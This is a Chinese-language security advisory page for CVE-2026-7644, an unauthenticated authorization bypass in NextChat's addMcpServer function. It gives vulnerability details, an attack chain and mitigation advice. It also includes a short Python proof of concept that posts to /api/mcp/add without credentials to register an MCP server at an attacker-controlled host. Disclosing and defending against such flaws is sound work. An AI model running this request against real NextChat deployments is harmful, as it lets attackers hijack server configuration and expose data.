IPBUF安全漏洞报告
English
CVE-2026-7644 CVSS 7.3 高危

CVE-2026-7644 ChatGPTNextWeb权限绕过漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7644
漏洞类型
权限绕过
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
ChatGPTNextWeb NextChat

相关标签

权限绕过CVE-2026-7644ChatGPTNextWeb未授权访问RCE

漏洞概述

ChatGPTNextWeb NextChat 2.16.1及之前版本存在授权不当漏洞。由于`app/mcp/actions.ts`文件中的`addMcpServer`函数未正确实施权限检查,远程攻击者无需身份认证即可利用该漏洞添加恶意MCP服务器配置。此漏洞可能影响系统的机密性、完整性和可用性,且相关利用代码已公开披露。

技术细节

该漏洞位于ChatGPTNextWeb NextChat项目的服务器端逻辑中,具体涉及文件`app/mcp/actions.ts`内的`addMcpServer`函数。该函数负责向系统添加新的MCP(Model Context Protocol)服务器。在受影响版本中,该函数缺乏对调用者权限的验证机制,导致未授权的匿名用户可以通过网络直接调用此接口。攻击者可以通过发送特制的HTTP POST请求,注入恶意的服务器地址参数。由于CVSS向量显示无需用户交互(UI:N)且无需认证(PR:N),利用门槛极低。成功利用后,攻击者可篡改系统配置,可能进一步导致敏感信息泄露或服务中断。

攻击链分析

STEP 1
侦察
攻击者识别出运行ChatGPTNextWeb NextChat 2.16.1或更低版本的目标系统。
STEP 2
漏洞利用
攻击者向`app/mcp/actions.ts`对应的API端点发送特制的POST请求,包含恶意的MCP服务器配置,且不携带任何认证凭据。
STEP 3
权限提升与配置篡改
由于系统未校验权限,`addMcpServer`函数执行操作,将攻击者控制的服务器添加到系统的信任列表中。
STEP 4
影响实现
系统机密性、完整性或可用性受到损害,可能导致数据泄露或后续攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://target-host/api/mcp/add" # Malicious MCP server payload payload = { "name": "ExploitServer", "url": "http://attacker-controlled-server.com/poc" } try: # Send request without authentication headers response = requests.post(target_url, json=payload, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Malicious MCP server added.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

ChatGPTNextWeb NextChat <= 2.16.1

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用MCP相关功能或通过WAF(Web应用防火墙)拦截针对`/api/mcp/add`路径的未授权请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表